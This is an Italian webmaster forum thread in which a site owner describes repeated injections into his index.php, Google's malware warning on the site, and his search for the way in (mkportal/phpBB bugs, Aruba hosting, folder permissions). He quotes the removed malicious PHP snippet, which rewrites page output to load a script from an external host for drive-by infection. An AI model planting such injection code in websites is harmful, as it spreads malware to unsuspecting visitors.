• User

    Sito penalizzato da Google

    Ciao a tutti , pongo all'attenzione dello staff una questione molto importante che spero di risolvere con voi al più presto.
    Molto sinteticamente la sicurezza del portale è andata a farsi fottere , entrano non so come e non sò dove e aggiungono in fondo alla pagina index.php delle righe di codice che all'apertura del sito sparano dei virus ai visitatori, questo mi stà recando un grosso danno in quanto il mio sito è ai primissimi posti su una query (cover dvd) che restituisce circa 6 milioni di risultati , google ha penalizzato il sito lasciandolo si nelle prime posizioni ma impedendone l'accesso dalle sue pagine , includendo nella descrizione la scritta "Questo sito potrebbe arrecare danni al tuo computer". Io stò monitorizzando il sito più volte al giorno ed ho tolto già 2 volte dalla pagina index.php gli script malevoli ma ovviamente non è cosi che posso aver risolto il problema. A lungo andare questa situazione mi porterà a perdere posizioni , quindi vi chiedo aiuto per capire da dove entrano , se chiamo Aruba mi dicono che non è un problema loro , ma che entrano da un bug del software che uso (mkportal) , speriamo almeno che voi possiate aiutarmi a risolvere . Datemi una mano per favore sono 3 anni di lavoro faticoso che vanno in fumo e questo non mi va proprio !!! grazie anticipatamente.

    vi aggiungo le righe di codice che ho appena tolto a modo che possiate capire meglio quale è il problema:

    <?php
    function phpfake($buffer)
    {
    $Exp='<script src="h**p://eaoafir.com/cgi-bin/index.cgi?grb&js=1" type="text/javascript"></script>';
    return (ereg_replace("</body>", "$Exp</body>", $buffer));
    }
    ?>


  • User

    Il portale è un phpnuke?


  • User Newbie

    Anch'io ho un sito su Aruba e mi sta succedendo qualcosa di molto simile.
    Aruba mi ha risposto che "la modifica dei files è stata possibile sfruttando la vulnerabilità dei CMS da lei usati" ma io non uso CMS e scrivo le mie pagine con notepad.


  • User

    Forse il problema risiede nei permessi associati alle cartelle, sto parlando del chmod, meglio non dare dei permessi di scrittura tipo 777.


  • User

    Ovviamente lo staff di mkportal mi dice che non dipende affatto da eventuali bug del portale ma che può dipendere da eventuali bug di phpbb che è strettamente legato a mkportal ma rimane comunque un forum esterrno, altrettanto ovviamente aruba mi dice che non dipende da loro ma dai bug del software che uso, stà di fatto che sono entrati e da alcune ricerche che ho fatto pare che sia un "Rootkit" , adesso è stato rimosso e la mia domanda di reinclusione è stata accolta e dopo verifica hanno tolto quel link fastidioso che impediva agli user di accedere alle pagine del mio sito da google.
    Mi hanno detto che controlleranno ancora e se troveranno ancora quelle schifezze questa volta il processo di reinclusione sarà più lungo.Siamo arrivati a controllare la index.php ogni ora per evitare di cadere ancora , ma capirete che è un lavoraccio , per cui mi chiedo se c'è qualche contromisura per blindare il sito senza dover stare li a fare le sentinelle. Grazie dell' interessamento